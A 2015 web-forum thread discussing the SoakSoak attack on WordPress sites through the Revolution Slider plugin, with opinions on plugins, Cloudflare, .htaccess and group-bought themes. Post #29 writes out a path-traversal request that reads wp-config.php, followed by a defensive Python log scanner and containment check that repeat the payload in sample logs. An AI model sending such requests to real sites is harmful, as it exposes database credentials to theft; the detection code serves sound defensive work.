02-05-2015, 06:57 AM
Post: #21
RE:
Wordfence alerts users about buggy plugins and themes.
02-05-2015, 05:34 PM
Post: #22
RE:
@Bale - It is NOT the core. I update daily and still suffered from SoakSoak.
@Intrapreneur - I say yes, and another user has been hacked with the updated version despite what the devs say (check the Sucuri forum).
@Angelina - See above.
@Intrepid - Did not in this case.

Sucuri and 9 other plugins failed to stop this.

The ONLY answer to prevent the next version of SoakSoak is:
- Cloudflare (use their geo blocking)
- Custom .htaccess files

NO PLUGIN WILL EVER STOP THESE ATTACKS!!!!!!

It's the architecture of WordPress, MySQL and PHP that makes it possible.
02-05-2015, 05:49 PM
Post: #23
RE:
PS - This hit over 100,000 sites on December 14, and more since; one of the largest hacks, through ONE plugin's bad coding. However the coder caused it, he was the one who 'fixed' it. Credibility of vendor = 0 in my books. The way they were speaking, it's an outsourced coder, not in-house.

Believe them at your own risk.
02-05-2015, 08:58 PM
Post: #24
RE:
SQL injection attacks and how they work:

http://www.unixwiz.net/techtips/sql-injection.html

If it was cPanel, almost every site in the world would be hacked.
02-05-2015, 09:20 PM
Post: #25
RE:
(02-04-2015 05:46 AM)utahman1971 Wrote:  
(02-03-2015 10:33 PM)danimation3d Wrote:  Woah far out, where'd you download this theme?
Personally, I stay away from the "nulled" crap. Group buys are probably the way to go. You'll spend $3-10 more than you would on a free nulled version, but you also avoid getting your butt hammered by some of the pricks out there who are waiting for you to play with their viruses.
Sorry, but GB is not the way to go, because you don't get a license with Themeforest. There is only one license, and that is the purchaser who gets it, and if that person shares his license, then the license gets deactivated. GB, if they do it, should not share the license, but that is bad for the group that pays, because they paid for no license for the theme. How many people on the internet are honest? If you do a GB for an extended license of the theme, that is way more money for the extended license, which makes the license able to be shared by multiple people.

$2900 for Newspaper theme for an example of extended license.
That's not correct.

None of the themes on Themeforest require activation, which means the theme does not call back to the developer, so people on a group buy can use the theme without worrying about malicious code being inserted.

The license txt file is usually just a text file for the agreement etc... Group buy is always my choice.
02-05-2015, 11:58 PM (This post was last modified: 02-05-2015 11:59 PM by ImGrateful.)
Post: #26
RE:
I'm saying in a general way that, in my opinion, Revolution Slider is already defamed by many all over the web; it has many loopholes which invite hackers.
I Wish You Always Stay Happier and Become More Wealthier

Day that changes everything Jim Rohn
02-06-2015, 12:31 AM
Post: #27
RE:
(02-05-2015 08:58 PM)grumble Wrote:  SQL injection attacks and how they work:

http://www.unixwiz.net/techtips/sql-injection.html

If it was cPanel, almost every site in the world would be hacked.

Thanks for sharing insights with our BBHF family.

This link might be useful for you and others: http://blog.sucuri.net/2014/09/slider-re...oited.html

Also, your blog post is a blessing for us:
http://jam88.com/index.php/blog/

Is your site completely cleaned now?
I Wish You Always Stay Happier and Become More Wealthier

Day that changes everything Jim Rohn
02-06-2015, 07:56 AM
Post: #28
RE:
@Imgrateful All my sites were cleaned within 24 hours (I had 3, clients had 2) and I cleaned over 30 for another person.

The Sucuri blog was one of many places I researched when I was fixing it. I spent 2 weeks researching how it happened and how to prevent it and 4 weeks learning how to secure sites.

CloudFlare serves up 'local' copies of your site, so the hacker only gets to the CDN (Content Delivery Network), and .htaccess works at server level to prevent read and write operations of any type you specify. WordPress (and Joomla, Drupal etc.) are 'underneath' the server, so they cannot effectively control server operations.

You're welcome. Nice when people say thanks :-)
02-06-2015, 08:23 AM (This post was last modified: 02-06-2015 08:24 AM by Xecution.)
Post: #29
RE:
Holy crap, I am glad I found this thread.

Anyone using Revolution Slider, simply type in the following command and voila, you have downloaded the config file and now have passwords, etc.

Code:
http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
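The request above is a plain path-traversal read through the plugin's `img` parameter. As an added example for this thread (not code from the plugin, Sucuri, Wordfence or any poster), the Python below does two defender-side things: it scans Apache combined-format access-log lines for `revslider_show_image` requests whose `img` value escapes its directory, and it shows the resolve-and-contain check a file-serving handler needs so such a value is refused rather than opened. The log lines, IP addresses and the `/srv/wp/uploads` base directory are constructed for the example.

```python
"""Detect path-traversal probes against the Revolution Slider
`revslider_show_image` AJAX action in access logs, and the server-side
containment check that would have refused them.

Added example for this thread; the log lines and paths are constructed."""
import re
from pathlib import Path
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Feb/2015:08:23:10 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "curl/7.38.0"
198.51.100.7 - - [06/Feb/2015:08:24:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2Fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Feb/2015:08:25:44 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slide1.jpg HTTP/1.1" 200 45120 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Feb/2015:08:26:02 +0000] "GET /index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the captured fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_traversal_probe(target):
    """True when the request is a revslider_show_image call whose img value,
    after URL-decoding (which the server does before using it), is absolute
    or contains a '..' path component."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    qs = parse_qs(parts.query)
    if qs.get("action", [""])[0] != "revslider_show_image":
        return False
    # parse_qs already decoded once; decode again so a double-encoded value is seen too.
    img = unquote(qs.get("img", [""])[0]).replace("\\", "/")
    return img.startswith("/") or ".." in img.split("/")


def find_probes(log_text):
    """Scan a log and return (ip, status, target) for every traversal probe.
    A 200 status on one of these means the file was actually served."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_traversal_probe(rec["target"]):
            hits.append((rec["ip"], rec["status"], rec["target"]))
    return hits


def safe_image_path(base_dir, requested):
    """The containment check the vulnerable handler lacked: join the requested
    name onto base_dir, normalise it, and refuse anything that resolves outside
    base_dir. Returns the resolved Path, or None if the request must be rejected."""
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    for ip, status, target in find_probes(SAMPLE_LOG):
        print(f"traversal probe from {ip} (status {status}): {target}")
    for name in ("slide1.jpg", "../wp-config.php", "/etc/passwd"):
        print(name, "->", safe_image_path("/srv/wp/uploads", name))
```

Run against a real log, the interesting hits are the probes that returned 200, since those are the reads that succeeded; every other line is just a scan. The containment check works because `Path.resolve()` collapses `..` components before `relative_to` is tested, so a value that starts inside the uploads directory but climbs out of it fails the check the same way an absolute path does.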
02-06-2015, 09:12 AM
Post: #30
RE:
@Xecution - Does this work on the 'fixed' version of Revslider?

Prediction: a new era of hacking has hit us. This won't be the first exploit using this technique, and other plugins will have other weak points.